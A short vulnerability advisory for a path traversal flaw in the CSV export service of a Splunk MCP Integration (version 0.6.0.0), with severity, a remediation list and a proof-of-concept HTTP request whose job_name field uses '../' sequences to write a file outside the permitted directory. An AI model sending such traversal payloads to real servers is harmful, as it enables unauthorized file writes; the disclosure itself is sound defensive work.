# Summary of Arbitrary File Write Vulnerability in Splunk MCP Integration CSV Export ## Vulnerability Overview The CSV export service in Splunk MCP Integration contains a path traversal vulnerability. Attackers can bypass the `CSV_OUTPUT_DIR` restriction by crafting a malicious `job_name` parameter using `..` and `/` sequences, allowing them to create and write CSV files at arbitrary locations on the server. ## Impact Scope - **Affected Versions**: Version `0.6.0.0` has been confirmed as affected. - **Scope of Impact**: Revised versions of the CSV export service that follow the same `job_name` to `file_name` mapping process. - **Severity**: CVSS v3.1 Score 7.1 (High) - **Attack Prerequisites**: The attacker must possess the `csv_create` permission. ## Remediation 1. Replace the filename derived from `job_name` with an internal identifier, or sanitize `job_name` into a safe filename. 2. Resolve the final path after connection and reject any path that falls outside `Path(settings.CSV_OUTPUT_DIR).resolve()`. 3. Add regression tests covering `../`, nested slashes, Windows separators, and absolute path prefixes. ## POC Code ```http POST /api/v1/export/ HTTP/1.1 Host: target-host Authorization: Bearer Content-Type: application/json { "job_name": "../../../../../tmp/csv_poc", "data_source": { "source_type": "static", "static_source": { "data": [ ["0001", "0a"] ] } }, "export_config": { "export_format": "csv" } } ```